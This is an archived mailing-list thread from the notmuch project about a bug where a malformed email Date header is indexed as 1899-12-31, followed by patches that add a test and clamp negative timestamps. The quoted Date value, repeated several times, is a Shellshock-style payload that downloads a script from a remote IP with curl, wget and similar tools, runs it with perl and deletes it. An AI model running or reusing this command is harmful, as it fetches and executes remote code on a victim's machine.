unofficial mirror of notmuch@notmuchmail.org
 help / color / mirror / code / Atom feed
* bug: notmuch cannot handle invalid Date fields
@ 2015-04-22  6:56 Johannes Schauer
  2015-04-22 13:37 ` Tomi Ollila
                   ` (3 more replies)
  0 siblings, 4 replies; 9+ messages in thread
From: Johannes Schauer @ 2015-04-22  6:56 UTC (permalink / raw)
  To: notmuch

[-- Attachment #1: Type: text/plain, Size: 1095 bytes --]

Hi,

I recently received an email with the following date field (the value of all
other headers is the same):

Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;

When doing `notmuch search lwp-download` I get:

thread:000000000001ea6b   1899-12-31 [1/1] {; () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &; (inbox unread)

You can see that the date is 1899-12-31 which is wrong.

This is annoying because the python module datetime which is for example used
by the notmuch client alot cannot handle dates before the year 1900 and will
thus never show this email in its thread view but instead display an exception
every time the view is refreshed.

It would be great if an invalid date could either somehow default to a nil
value or be a date that is 1900 or later.

Thanks!

cheers, josch

[-- Attachment #2: signature --]
[-- Type: application/pgp-signature, Size: 819 bytes --]

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAABCAAGBQJVN0YeAAoJEPLLpcePvYPhSOAQAIshVq9O3v5N2jjiE9tKcuqC
mZ1rm6X2jZm/kbWFX1NSnQ5qI7Tyuy0S549k+/n3i3FTGxbYIyAaqJ5wSuTaqCNa
nyRe4LNKT2mOq7RUt8XsD1fmUm8RIoxbGYqACsaugNP51K6IZCkwWxAtCj6u362c
4sTtOnsTd5AcDyWDX1ErX0nC/Jt7aWXIeBJm9P+XodKX+Vr1RFVxT83pkx7QOoQ4
aQMOdoQaVbejCN9bi93R/z8UWXCGxaC12FMNUCGPGGJHZQ4VUzNCJ303wQqb+4O7
6qKc6bzJg4YEbLgsr8oeWh0bkFjPiSdExFiS2uUYmaaM3aH5Y1ndayBhOXV9UrLS
KSKrdJbUnqKaeMpCE4ACwL6MKO4tBek4hYwFETaP3fmhjm1uK2Bu6FgDM+3XTL9n
3kMBoQlkoA1EdaT3JQK+irBCnEoLzy897vqtf6YkgoKHbX4k2Fx9Bt2XUa7tygv3
1Ez6pRv9t8kHsde+ZU7xrQlJG5JfNDT43zP07VJUV10ctU2ZCt8cu3fMgrCPsK1m
rx3RcnTNg2nbIq5fHhVZTk40s/3dA7yJua6i/nwaQaY7yX/AhHLGMU97krlkB83n
xuYeuuKLj5Nv8QUTZ+juMVsEP6ukeM0ChtVIbMqP47/kuUvGqvYcn0Ii64HjF1jQ
AjnMU1UmJfwH/+lpFnvI
=dT8/
-----END PGP SIGNATURE-----

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: bug: notmuch cannot handle invalid Date fields
  2015-04-22  6:56 bug: notmuch cannot handle invalid Date fields Johannes Schauer
@ 2015-04-22 13:37 ` Tomi Ollila
  2015-04-22 13:42   ` Johannes Schauer
  2017-03-12  1:38 ` David Bremner
                   ` (2 subsequent siblings)
  3 siblings, 1 reply; 9+ messages in thread
From: Tomi Ollila @ 2015-04-22 13:37 UTC (permalink / raw)
  To: Johannes Schauer, notmuch

On Wed, Apr 22 2015, Johannes Schauer <j.schauer@email.de> wrote:

> Hi,
>
> I recently received an email with the following date field (the value of all
> other headers is the same):
>
> Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
>
> When doing `notmuch search lwp-download` I get:
>
> thread:000000000001ea6b   1899-12-31 [1/1] {; () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &; (inbox unread)
>
> You can see that the date is 1899-12-31 which is wrong.
>
> This is annoying because the python module datetime which is for example used
> by the notmuch client alot cannot handle dates before the year 1900 and will
> thus never show this email in its thread view but instead display an exception
> every time the view is refreshed.

What do you mean by that datetime cannot handle dates before 1900 ?

:  $ python
:  Python 2.7.6 (default, Mar 22 2014, 22:59:56)
:  ...
:  >>> datetime.datetime.strptime('1799-11', '%Y-%m')
:  datetime.datetime(1799, 11, 1, 0, 0)
:  >>> x=datetime.datetime.strptime('1799-11', '%Y-%m')
:  >>> x.isoformat()
:  '1799-11-01T00:00:00'

Tomi


> It would be great if an invalid date could either somehow default to a nil
> value or be a date that is 1900 or later.
>
> Thanks!
>
> cheers, josch

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: bug: notmuch cannot handle invalid Date fields
  2015-04-22 13:37 ` Tomi Ollila
@ 2015-04-22 13:42   ` Johannes Schauer
  0 siblings, 0 replies; 9+ messages in thread
From: Johannes Schauer @ 2015-04-22 13:42 UTC (permalink / raw)
  To: notmuch

[-- Attachment #1: Type: text/plain, Size: 1022 bytes --]

Hi,

Quoting Tomi Ollila (2015-04-22 15:37:15)
> What do you mean by that datetime cannot handle dates before 1900 ?
> 
> :  $ python
> :  Python 2.7.6 (default, Mar 22 2014, 22:59:56)
> :  ...
> :  >>> datetime.datetime.strptime('1799-11', '%Y-%m')
> :  datetime.datetime(1799, 11, 1, 0, 0)
> :  >>> x=datetime.datetime.strptime('1799-11', '%Y-%m')
> :  >>> x.isoformat()
> :  '1799-11-01T00:00:00'

from the docs:

"The exact range of years for which strftime() works also varies across
platforms. Regardless of platform, years before 1900 cannot be used."

or:

$ python
Python 2.7.9 (default, Dec 11 2014, 08:58:12) 
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import datetime
>>> x=datetime.datetime.strptime('1799-11', '%Y-%m')
>>> x.strftime("%P")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
ValueError: year=1799 is before 1900; the datetime strftime() methods require year >= 1900


cheers, josch

[-- Attachment #2: signature --]
[-- Type: application/pgp-signature, Size: 819 bytes --]

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAABCAAGBQJVN6VPAAoJEPLLpcePvYPh94MQALSyLX0DA3jJN7mZnexkJhxS
5MlanN5d3nWsHvpL+BAGgfP1HKT6HdegwXh3rmJUKmNWkHq9VtZVVVN7Qkx8Ea06
phjRlwRuR1Zl3HihYTbWZ3xCBOUM7QeVrT3APNJcixWmlJwNZq2q7QhCirqDh8cB
vfheYBkoflsf2FQu2/B9g0AK6zCXh7eYXDSrinUVUkMOsyIQBkiSBM+OhpyncOFJ
PCtNfof58TJKxXV5qoPxN02Emv6DPVFrULuKhrIlb2bq8LwGylerF65PGlz3MEJs
i9kQ/NaSo9Ge2sL6ITz9Q2CEmJJ3Ys4jLtLOsouQ9OY9gWDvIdHiy4FpD8om/v8u
XIjxIShHreAVQEB3olpooF70ZXmVh6tLVy4YJLQ+6hndN/bu2AYylbSWBl35J5Fm
JLD0I6JbY1x2mr86FM3UM0xIHgFz8tKK9dPC8L+xvjfeskY9A3xRYLVP2vip3+sk
/8b9Md1Lril9xGOBsqkzkhuV9duycUhpt6rhlQj0aqcx5LPWh8qPmn6aw/fb70lz
dGc1Z3FkTrPGE7puJvdh6njZrbY/0PrctsyH+hQyVv5qhcv3p6i0i6c9AqyV6/qm
8EQ+KzC+h9qUmxlwoZFQb5wie7Y+6g9Tko5dG19TOx72gFXLDPIcbsfJYuUgJBWW
BeH8p/npuV8dsSr1hbZW
=jzje
-----END PGP SIGNATURE-----

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: bug: notmuch cannot handle invalid Date fields
  2015-04-22  6:56 bug: notmuch cannot handle invalid Date fields Johannes Schauer
  2015-04-22 13:37 ` Tomi Ollila
@ 2017-03-12  1:38 ` David Bremner
  2017-03-12 12:51 ` [PATCH 1/2] lib: add known broken test for parsing bad dates David Bremner
  2017-03-19 12:31 ` bug: notmuch cannot handle invalid Date fields David Bremner
  3 siblings, 0 replies; 9+ messages in thread
From: David Bremner @ 2017-03-12  1:38 UTC (permalink / raw)
  To: Johannes Schauer, notmuch; +Cc: Daniel Kahn Gillmor

Johannes Schauer <j.schauer@email.de> writes:

> Hi,
>
> I recently received an email with the following date field (the value of all
> other headers is the same):
>
> Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
>
> When doing `notmuch search lwp-download` I get:
>
> thread:000000000001ea6b   1899-12-31 [1/1] {; () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &; (inbox unread)
>
> You can see that the date is 1899-12-31 which is wrong.
>
> This is annoying because the python module datetime which is for example used
> by the notmuch client alot cannot handle dates before the year 1900 and will
> thus never show this email in its thread view but instead display an exception
> every time the view is refreshed.
>
> It would be great if an invalid date could either somehow default to a nil
> value or be a date that is 1900 or later.
>

I believe the underlying problem is a bug in the gmime library. I've
reported it it at

         https://bugzilla.gnome.org/show_bug.cgi?id=779923

We'll see if upstream agrees.  If my understanding of the situation is
correct, it should be easy enough to clamp the return value from gmime
so that only non-negative time values are saved into the notmuch database.

d

^ permalink raw reply	[flat|nested] 9+ messages in thread

* [PATCH 1/2] lib: add known broken test for parsing bad dates.
  2015-04-22  6:56 bug: notmuch cannot handle invalid Date fields Johannes Schauer
  2015-04-22 13:37 ` Tomi Ollila
  2017-03-12  1:38 ` David Bremner
@ 2017-03-12 12:51 ` David Bremner
  2017-03-12 12:51   ` [PATCH 2/2] lib: clamp return value of g_mime_utils_header_decode_date to >=0 David Bremner
  2017-03-19 12:31 ` bug: notmuch cannot handle invalid Date fields David Bremner
  3 siblings, 1 reply; 9+ messages in thread
From: David Bremner @ 2017-03-12 12:51 UTC (permalink / raw)
  To: Johannes Schauer, notmuch

This reproduces the symptoms of bug report
id:20150422065630.6330.90536@hoothoot
---
 test/T660-bad-date.sh | 15 +++++++++++++++
 1 file changed, 15 insertions(+)
 create mode 100755 test/T660-bad-date.sh

diff --git a/test/T660-bad-date.sh b/test/T660-bad-date.sh
new file mode 100755
index 00000000..6463d5b8
--- /dev/null
+++ b/test/T660-bad-date.sh
@@ -0,0 +1,15 @@
+#!/usr/bin/env bash
+test_description="parsing of bad dates"
+. ./test-lib.sh || exit 1
+
+add_message [date]='"()"'
+
+test_begin_subtest 'Bad dates translate to a date after the Unix epoch'
+test_subtest_known_broken
+cat <<EOF >EXPECTED
+thread:0000000000000001   1970-01-01 [1/1] Notmuch Test Suite; Test message #1 (inbox unread)
+EOF
+notmuch search '*' > OUTPUT
+test_expect_equal_file EXPECTED OUTPUT
+
+test_done
-- 
2.11.0

^ permalink raw reply related	[flat|nested] 9+ messages in thread

* [PATCH 2/2] lib: clamp return value of g_mime_utils_header_decode_date to >=0
  2017-03-12 12:51 ` [PATCH 1/2] lib: add known broken test for parsing bad dates David Bremner
@ 2017-03-12 12:51   ` David Bremner
  2017-03-15 20:09     ` Tomi Ollila
  2017-03-16  1:16     ` David Bremner
  0 siblings, 2 replies; 9+ messages in thread
From: David Bremner @ 2017-03-12 12:51 UTC (permalink / raw)
  To: Johannes Schauer, notmuch

For reasons not completely understood at this time, gmime (as of
2.6.22) is returning a date before 1900 on bad date input. Since this
confuses some other software, we clamp such dates to 0,
i.e. 1970-01-01.
---
 lib/message.cc | 9 +++++++--
 1 file changed, 7 insertions(+), 2 deletions(-)

diff --git a/lib/message.cc b/lib/message.cc
index 007f1171..8a8a25b4 100644
--- a/lib/message.cc
+++ b/lib/message.cc
@@ -1034,10 +1034,15 @@ _notmuch_message_set_header_values (notmuch_message_t *message,
 
     /* GMime really doesn't want to see a NULL date, so protect its
      * sensibilities. */
-    if (date == NULL || *date == '\0')
+    if (date == NULL || *date == '\0') {
 	time_value = 0;
-    else
+    } else {
 	time_value = g_mime_utils_header_decode_date (date, NULL);
+	/*
+	 * Workaround for https://bugzilla.gnome.org/show_bug.cgi?id=779923
+	 */
+	time_value = (time_value < 0) ? 0 : time_value;
+    }
 
     message->doc.add_value (NOTMUCH_VALUE_TIMESTAMP,
 			    Xapian::sortable_serialise (time_value));
-- 
2.11.0

^ permalink raw reply related	[flat|nested] 9+ messages in thread

* Re: [PATCH 2/2] lib: clamp return value of g_mime_utils_header_decode_date to >=0
  2017-03-12 12:51   ` [PATCH 2/2] lib: clamp return value of g_mime_utils_header_decode_date to >=0 David Bremner
@ 2017-03-15 20:09     ` Tomi Ollila
  2017-03-16  1:16     ` David Bremner
  1 sibling, 0 replies; 9+ messages in thread
From: Tomi Ollila @ 2017-03-15 20:09 UTC (permalink / raw)
  To: David Bremner, Johannes Schauer, notmuch

On Sun, Mar 12 2017, David Bremner <david@tethera.net> wrote:

> For reasons not completely understood at this time, gmime (as of
> 2.6.22) is returning a date before 1900 on bad date input. Since this
> confuses some other software, we clamp such dates to 0,
> i.e. 1970-01-01.
> ---
>  lib/message.cc | 9 +++++++--
>  1 file changed, 7 insertions(+), 2 deletions(-)
>
> diff --git a/lib/message.cc b/lib/message.cc
> index 007f1171..8a8a25b4 100644
> --- a/lib/message.cc
> +++ b/lib/message.cc
> @@ -1034,10 +1034,15 @@ _notmuch_message_set_header_values (notmuch_message_t *message,
>  
>      /* GMime really doesn't want to see a NULL date, so protect its
>       * sensibilities. */
> -    if (date == NULL || *date == '\0')
> +    if (date == NULL || *date == '\0') {
>  	time_value = 0;

"Too bad" we already do this time_value = 0, otherwise I'd suggested
-2111111111 

$ perl -le 'print scalar localtime -2111111111'
Sat Feb  7 21:54:38 1903

That is something where Julian calendar is also in 20th century ;)

> -    else
> +    } else {
>  	time_value = g_mime_utils_header_decode_date (date, NULL);
> +	/*
> +	 * Workaround for https://bugzilla.gnome.org/show_bug.cgi?id=779923
> +	 */
> +	time_value = (time_value < 0) ? 0 : time_value;

Although the above probably realizes as..., I'd propose (IMO for clarity)

        if (time_value < 0)
            time_value = 0;

Anyway, LGTM.

Tomi


Btw: I Added notmuch show --format=json '*' >&6 to the test script, and it
printed:

[[[{"id": "msg-001@notmuch-test-suite", "match": true, "excluded": false,
"filename": ["/home/too/vc/ext/notmuch/test/tmp.T111-x/mail/msg-001"],
"timestamp": 2085892096, "date_relative": "1899-12-31", "tags": ["inbox",
"unread"], "headers": {"Subject": "Test message #1", "From": "Notmuch Test
Suite <test_suite@notmuchmail.org>", "To": "Notmuch Test Suite
<test_suite@notmuchmail.org>", "Date": "Sun, 31 Dec 1899 00:00:00 +0000"},
"body": [{"id": 1, "content-type": "text/plain", "content": "This is just a
test message (#1)\n"}]}, []]]]

(... which one can see I just pasted to a new file... ;)


$ perl -le 'print scalar localtime 2085892096' 
Wed Feb  6 08:28:16 2036

So, it looks like we store the large negative time_value to a 32-bit signed
integer...



> +    }
>  
>      message->doc.add_value (NOTMUCH_VALUE_TIMESTAMP,
>  			    Xapian::sortable_serialise (time_value));
> -- 
> 2.11.0
>
> _______________________________________________
> notmuch mailing list
> notmuch@notmuchmail.org
> https://notmuchmail.org/mailman/listinfo/notmuch

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: [PATCH 2/2] lib: clamp return value of g_mime_utils_header_decode_date to >=0
  2017-03-12 12:51   ` [PATCH 2/2] lib: clamp return value of g_mime_utils_header_decode_date to >=0 David Bremner
  2017-03-15 20:09     ` Tomi Ollila
@ 2017-03-16  1:16     ` David Bremner
  1 sibling, 0 replies; 9+ messages in thread
From: David Bremner @ 2017-03-16  1:16 UTC (permalink / raw)
  To: Johannes Schauer, notmuch

David Bremner <david@tethera.net> writes:

> For reasons not completely understood at this time, gmime (as of
> 2.6.22) is returning a date before 1900 on bad date input. Since this
> confuses some other software, we clamp such dates to 0,
> i.e. 1970-01-01.

series pushed, amended per Tomi's suggestion. It's possible I've been
writing an unhealthy amount of scheme lately. Dunno what else would make
the ternary if operator look sensible.

d

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: bug: notmuch cannot handle invalid Date fields
  2015-04-22  6:56 bug: notmuch cannot handle invalid Date fields Johannes Schauer
                   ` (2 preceding siblings ...)
  2017-03-12 12:51 ` [PATCH 1/2] lib: add known broken test for parsing bad dates David Bremner
@ 2017-03-19 12:31 ` David Bremner
  3 siblings, 0 replies; 9+ messages in thread
From: David Bremner @ 2017-03-19 12:31 UTC (permalink / raw)
  To: Johannes Schauer, notmuch

Johannes Schauer <j.schauer@email.de> writes:

> Hi,
>
> I recently received an email with the following date field (the value of all
> other headers is the same):
>
> Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &;
>
> When doing `notmuch search lwp-download` I get:
>
> thread:000000000001ea6b   1899-12-31 [1/1] {; () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*' &; (inbox unread)
>
> You can see that the date is 1899-12-31 which is wrong.

This should now be fixed, as of 62822a4e2

d

^ permalink raw reply	[flat|nested] 9+ messages in thread

end of thread, other threads:[~2017-03-19 12:31 UTC | newest]

Thread overview: 9+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2015-04-22  6:56 bug: notmuch cannot handle invalid Date fields Johannes Schauer
2015-04-22 13:37 ` Tomi Ollila
2015-04-22 13:42   ` Johannes Schauer
2017-03-12  1:38 ` David Bremner
2017-03-12 12:51 ` [PATCH 1/2] lib: add known broken test for parsing bad dates David Bremner
2017-03-12 12:51   ` [PATCH 2/2] lib: clamp return value of g_mime_utils_header_decode_date to >=0 David Bremner
2017-03-15 20:09     ` Tomi Ollila
2017-03-16  1:16     ` David Bremner
2017-03-19 12:31 ` bug: notmuch cannot handle invalid Date fields David Bremner

Code repositories for project(s) associated with this public inbox

	https://yhetil.org/notmuch.git/

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).